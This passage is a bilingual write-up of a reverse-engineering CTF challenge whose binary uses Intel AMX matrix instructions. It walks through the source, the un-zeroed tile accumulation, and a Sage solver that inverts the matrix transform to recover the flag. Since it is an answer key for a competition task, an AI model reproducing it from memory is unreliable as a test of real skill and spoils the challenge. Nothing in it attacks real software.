    0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,1,1,1,1,
 
};
 
const tileconfig_t config = {
    .palette_id = 1,
    .startRow   = 0,
    .reserved = {0},
    .colb = { 48, 64, 64, 64, 64, 64, 64 },
    .rows = { 4, 12, 12, 12, 4, 4, 4 }
};
 
const uint8_t correct[192] = {
    116,180,186,0,219,64,88,156,207,211,240,56,191,199,95,45,193,23,236,254,38,4,230,214,126,66,234,104,152,6,226,136,168,98,250,231,139,125,161,189,225,216,78,137,247,36,80,64,
    222,53,34,159,109,139,173,78,194,105,156,42,217,171,73,121,102,140,18,72,181,246,199,98,215,56,6,9,141,36,212,99,91,113,229,128,203,105,46,193,6,171,6,222,76,142,245,133,
    199,167,139,133,53,0,195,82,146,142,106,206,181,70,75,70,223,8,75,209,85,250,188,83,63,238,195,239,185,239,115,241,66,99,159,23,182,38,204,219,138,190,103,8,201,162,34,32,
    157,139,24,29,207,207,111,46,231,2,139,149,7,103,75,94,210,205,143,107,208,106,50,240,147,37,229,83,176,198,180,76,8,173,60,229,100,177,117,43,85,100,71,207,186,59,76,199,
};
 
int main(void) {
    if (!__builtin_cpu_supports("amx-avx512")) {
        printf("Your environment is too old for this binary!\n");
        return -1;
    }
    char buf[49];
    uint32_t* arr = (uint32_t*)malloc(192);
    printf("Give me your input: ");
    fflush(stdout);
 
    ssize_t n = read(0, buf, 49);
    if (buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
    }
    if (strlen(buf) != 48) {
        printf("Wrong :(\n");
        return 1;
    }
    for (size_t i = 0; i < 48; i++) {
        arr[i] = (uint32_t)buf[i];
    }
 
    _tile_loadconfig(&config);
    _tile_loadd(1, mat, 64);
    _tile_loadd(2, mat + 768, 64);
    _tile_loadd(3, mat + 1536, 64);
 
    for (int t = 0; t < 100000; t++) {
        _tile_loadd(0, arr, 48);
        _tile_dpbuud(4, 0, 1);
        _tile_dpbuud(5, 0, 2);
        _tile_dpbuud(6, 0, 3);
        for (int i = 0; i < 4; i++) {
            _mm512_mask_compressstoreu_epi8(arr + 12 * i + 0, 0x1111111111111111, (__m512i)_tile_movrow(4, i));
            _mm512_mask_compressstoreu_epi8(arr + 12 * i + 4, 0x1111111111111111, (__m512i)_tile_movrow(5, i));
            _mm512_mask_compressstoreu_epi8(arr + 12 * i + 8, 0x1111111111111111, (__m512i)_tile_movrow(6, i));
        }
    }
 
    if (memcmp(arr, &correct, 192) == 0) {
        printf("Correct! The flag is tkbctf{%s}\n", buf);
    } else {
        printf("Wrong :(\n");
    }
    _tile_release();
    free(arr);
    return 0;
}

コードの詳しい解説をします。

configを見ると、tmm0は4 x 48 byte、tmm1,tmm2,tmm3は12 x 64 byte、tmm4,tmm5,tmm6は4 x 64 byteとして使われています。 _tile_dpbuud(dst, a, b)は、aの各行とbの各列について、unsigned byteの積和を取り、その結果をdstの32bit整数に加算する命令です。したがって、tmm0とtmm1からtmm4には4 x 16個の32bit整数が書かれます。同様にtmm2,tmm3を使ってtmm5,tmm6も計算しているので、1回のループで合計48個の32bit整数が更新されていることがわかります。

その後の_tile_movrowと_mm512_mask_compressstoreu_epi8は、マスクとして0x1111111111111111が指定されていることから、各32bit整数の下位1byteだけを取り出してarrに詰め直しています。よって、この処理全体はmod 256での線形変換として扱うことができます。

1行48byteの状態を $a$ として見ると、1回の変換は $a \mapsto aM$ という形に書けます。ただし、 $M$ はmatそのままではなく、AMXにおける特殊なメモリ配置を考慮して変換する必要があります。

ここで注意が必要なのが、ループ内でタイルの初期化命令であるtilezeroが呼び出されていない点です。_tile_dpbuudは積和命令なので、本来は各ループの先頭で_tile_zero(4),_tile_zero(5),_tile_zero(6)を呼んで出力タイルを初期化する必要があります。このコードではそれらが呼ばれていないので、4,5,6番のタイルレジスタには前回のループの値が残っています。 _tile_loadconfigの時点ではタイルレジスタは初期化されるため、1回目のループだけは単純に $a \mapsto aM$ ですが、2回目以降は前回の値に新しい積が加算され、遷移は $a \mapsto a(M+I)$ になります。

よって、100000回後の状態をcorrectとすると、元の入力は $correct \cdot M^{-1} \cdot (M+I)^{-99999}$ のように逆変換することで求めることができます。 correctは48byteずつ4ブロックに分かれているので、それぞれに対してこの計算を行えばよいです。

最後に、初期状態では

for (size_t i = 0; i < 48; i++) {
    arr[i] = (uint32_t)buf[i];
}

となっているため、各文字は4byteごとに1byteだけ配置されています。したがって、逆変換後の48要素から[::4]を取り出すと元の12文字が得られます。これを4ブロック分連結すると、入力全体、すなわちフラグが復元できます。行列サイズが大きいため、numpyなどの数値計算ライブラリを使うか、繰り返し二乗法を使って計算する必要があります。

ソルバは以下の通りです。

ソルバ（クリックで展開）

from sage.all import *
 
with open("./binary-in-the-future", "rb") as f:
    b = f.read()
 
a = [list(b[0x3960+48*i:0x3960+48*(i+1)]) for i in range(4)]
M = matrix(Zmod(256), [[b[0x3020 + ((j // 16) * 12 + i // 4) * 64 + (j % 16) * 4 + i % 4] for j in range(48)] for i in range(48)])
I = identity_matrix(48)
 
flag = b""
for i in range(4):
    b = vector(Zmod(256), a[i]) * M**-1 * (M+I)**-99999
    flag += bytes(b[::4])
print(flag)

rev

BINARY IN THE FUTURE. (64 solves)

Challenge

Only an executable binary is distributed. Running it accepts 48 characters of input, and if the result after repeating an internal transformation 100000 times matches, it outputs tkbctf{input}.

Solution

Trying to decompile the distributed binary should produce errors in most decompilers. In Binary Ninja, instructions like __ldtilecfg_mem and __tdpbuud_tmmu32_tmm4u8_tmm4u8 can be seen, but decompilation fails after that. Also, running it normally outputs Your environment is too old for this binary! and exits. The distributed Dockerfile runs sde64 -future -- /app/binary-in-the-future, which tells us that this binary is compiled for future CPUs and cannot be run directly in the current environment.

Disassembling with objdump reveals unfamiliar instructions like tilemovrow %eax,%tmm5,%zmm0 and tdpbuud %tmm1,%tmm0,%tmm4. These are Intel AMX instructions. AMX is a new instruction set announced in 2021, supported only on some CPUs such as Xeon. In particular, AMX-AVX512 instructions such as tilemovrow are planned to be supported only on CPUs starting from Diamond Rapids, and as of March 2026 no released CPU supports them. GCC and objdump already support these instructions, but most decompilers do not yet, which is why decompilation fails.

For AMX instructions, the following article is helpful. (This is actually an article I wrote during an internship.)

https://zenn.dev/fixstars/articles/amx-introduction

The pre-compilation code was as follows.

Pre-compilation code (click to expand)

 
#include <immintrin.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <cstring>
 
#define ARCH_REQ_XCOMP_PERM 0x1023
#define XFEATURE_XTILEDATA  18
 
typedef struct tileconfig_t {
    uint8_t  palette_id;
    uint8_t  startRow;
    uint8_t  reserved[14];
    uint16_t colb[16];
    uint8_t  rows[16];
} tileconfig_t;
 
const uint8_t mat[2304] = {
    0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,
    0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,1,1,1,1,
 
};
 
const tileconfig_t config = {
    .palette_id = 1,
    .startRow   = 0,
    .reserved = {0},
    .colb = { 48, 64, 64, 64, 64, 64, 64 },
    .rows = { 4, 12, 12, 12, 4, 4, 4 }
};
 
const uint8_t correct[192] = {
    116,180,186,0,219,64,88,156,207,211,240,56,191,199,95,45,193,23,236,254,38,4,230,214,126,66,234,104,152,6,226,136,168,98,250,231,139,125,161,189,225,216,78,137,247,36,80,64,
    222,53,34,159,109,139,173,78,194,105,156,42,217,171,73,121,102,140,18,72,181,246,199,98,215,56,6,9,141,36,212,99,91,113,229,128,203,105,46,193,6,171,6,222,76,142,245,133,
    199,167,139,133,53,0,195,82,146,142,106,206,181,70,75,70,223,8,75,209,85,250,188,83,63,238,195,239,185,239,115,241,66,99,159,23,182,38,204,219,138,190,103,8,201,162,34,32,
    157,139,24,29,207,207,111,46,231,2,139,149,7,103,75,94,210,205,143,107,208,106,50,240,147,37,229,83,176,198,180,76,8,173,60,229,100,177,117,43,85,100,71,207,186,59,76,199,
};
 
int main(void) {
    if (!__builtin_cpu_supports("amx-avx512")) {
        printf("Your environment is too old for this binary!\n");
        return -1;
    }
    char buf[49];
    uint32_t* arr = (uint32_t*)malloc(192);
    printf("Give me your input: ");
    fflush(stdout);
 
    ssize_t n = read(0, buf, 49);
    if (buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
    }
    if (strlen(buf) != 48) {
        printf("Wrong :(\n");
        return 1;
    }
    for (size_t i = 0; i < 48; i++) {
        arr[i] = (uint32_t)buf[i];
    }
 
    _tile_loadconfig(&config);
    _tile_loadd(1, mat, 64);
    _tile_loadd(2, mat + 768, 64);
    _tile_loadd(3, mat + 1536, 64);
 
    for (int t = 0; t < 100000; t++) {
        _tile_loadd(0, arr, 48);
        _tile_dpbuud(4, 0, 1);
        _tile_dpbuud(5, 0, 2);
        _tile_dpbuud(6, 0, 3);
        for (int i = 0; i < 4; i++) {
            _mm512_mask_compressstoreu_epi8(arr + 12 * i + 0, 0x1111111111111111, (__m512i)_tile_movrow(4, i));
            _mm512_mask_compressstoreu_epi8(arr + 12 * i + 4, 0x1111111111111111, (__m512i)_tile_movrow(5, i));
            _mm512_mask_compressstoreu_epi8(arr + 12 * i + 8, 0x1111111111111111, (__m512i)_tile_movrow(6, i));
        }
    }
 
    if (memcmp(arr, &correct, 192) == 0) {
        printf("Correct! The flag is tkbctf{%s}\n", buf);
    } else {
        printf("Wrong :(\n");
    }
    _tile_release();
    free(arr);
    return 0;
}

Here is a detailed explanation of the code.

Looking at config, tmm0 is used as 4 x 48 bytes, tmm1, tmm2, tmm3 as 12 x 64 bytes, and tmm4, tmm5, tmm6 as 4 x 64 bytes. _tile_dpbuud(dst, a, b) is an instruction that takes the dot product of each row of a and each column of b with unsigned bytes, and adds the result to the 32-bit integers in dst. Therefore, from tmm0 and tmm1, tmm4 contains 4 x 16 32-bit integers. Similarly tmm5, tmm6 are computed using tmm2, tmm3, so per loop iteration a total of 48 32-bit integers are updated.

The subsequent _tile_movrow and _mm512_mask_compressstoreu_epi8 use mask 0x1111111111111111, which extracts only the lowest 1 byte of each 32-bit integer and packs them back into arr. Therefore, this entire operation can be treated as a linear transformation modulo 256.

Viewing the 48-byte state as a row vector $a$ , each transformation has the form $a \mapsto aM$ . However, $M$ is not mat directly but must be converted considering the special memory layout in AMX.

An important point is that the tile initialization instruction tilezero is not called inside the loop. Since _tile_dpbuud is an accumulate instruction, normally _tile_zero(4), _tile_zero(5), _tile_zero(6) would be called at the start of each loop to initialize the output tiles. Since these are not called in this code, tile registers 4, 5, 6 retain the values from the previous loop iteration. At _tile_loadconfig the tile registers are initialized, so only the first loop iteration is simply $a \mapsto aM$ , but from the second iteration onwards the previous value is accumulated, making the transition $a \mapsto a(M+I)$ .

Therefore, if the state after 100000 iterations is correct, the original input can be recovered by the inverse transformation $correct \cdot M^{-1} \cdot (M+I)^{-99999}$ . Since correct is split into 4 blocks of 48 bytes each, this computation can be performed for each block.

Finally, note that in the initial state:

for (size_t i = 0; i < 48; i++) {
    arr[i] = (uint32_t)buf[i];
}

each character is placed as only 1 byte every 4 bytes. Therefore, taking [::4] from the 48 elements after inverse transformation gives the original 12 characters. Concatenating 4 blocks gives the full input, i.e., the flag. Since the matrix size is large, use a numerical library like numpy or compute using repeated squaring.

The solver is as follows.

Solver (click to expand)

from sage.all import *
 
with open("./binary-in-the-future", "rb") as f:
    b = f.read()
 
a = [list(b[0x3960+48*i:0x3960+48*(i+1)]) for i in range(4)]
M = matrix(Zmod(256), [[b[0x3020 + ((j // 16) * 12 + i // 4) * 64 + (j % 16) * 4 + i % 4] for j in range(48)] for i in range(48)])
I = identity_matrix(48)
 
flag = b""
for i in range(4):
